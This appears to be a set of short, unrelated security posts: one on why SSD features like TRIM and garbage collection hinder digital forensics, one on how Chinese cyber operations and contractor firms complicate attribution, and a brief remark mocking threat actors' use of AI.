bat

It will surprise you to know that a lot of Digital Forensics Investigators don’t really like the idea of investigating SSDs. EVIDENCE CAN BE LOST AFTER A LAWFUL SEIZURE, AND SOLID-STATE DRIVES (SSDS) CAN ACT AS UNINTENTIONAL ANTI-FORENSIC DEVICES. SSDs Break a Core Forensic Principle in Digital Forensics. One of the foundational assumptions in digital forensics, developed during the era of magnetic hard disk drives (HDDs), is: “Deleted data remains on storage media until it is overwritten.” This is a long traditional principle. Solid-State Drives can be viewed as unintentional anti-forensic devices because, unlike deliberate anti-forensic tools, they destroy potential evidence as part of their normal operation, without any malicious intent from the user.  The assumption that deleted data remains until overwritten no longer universally applies. SSDs break this principle by design through: 1. TRIM 2. Garbage collection 3. Wear leveling Because SSDs invalidate the “deleted data persists” principle, investigators must adapt by: 1. Prioritizing live analysis 2. Capturing volatile memory 3. Collecting system logs and cloud artifacts 4. Acting quickly before TRIM executes

What separates Chinese cyber ops from Five Eyes? Three things that shifted my thinking about this topic: 1. Early cyber training (90s-2000s) happened on live targets. Not sandboxes, not simulations...actual foreign infrastructure. The "practice" was the operation. Operational errors caught during IR back then weren't failures of tradecraft... they were the cost of learning on production. 2. The private sector operates as APT infrastructure. Cybersecurity companies founded by former 2000s hackers (Topsec, i-SOON, Integrity Tech) were later publicly linked to state-directed operations. The line between "legitimate vendor" and "APT contractor" is deliberately blurred (by design). 3. Operators don't stay siloed in their APT group. They rotate across teams for decades, carrying often the exact same tools, tactics with them. What we label as "different APT groups" is often the same people with different hats. This makes attribution way messier than the tidy narrative we see in threat reports. Worth reading this epic report published by the Zurich Centre for Security Studies if this stuff keeps you up at night: https://t.co/aGgMyPniWF

Honestly it doesn't matter much for defenders - code is code. We mostly talk about it to point out that threat actors STILL can't properly leverage AI and it's fun to roast them. This one goes out to everyone claiming "AI is a massive threat because TAs will use it for big bad things"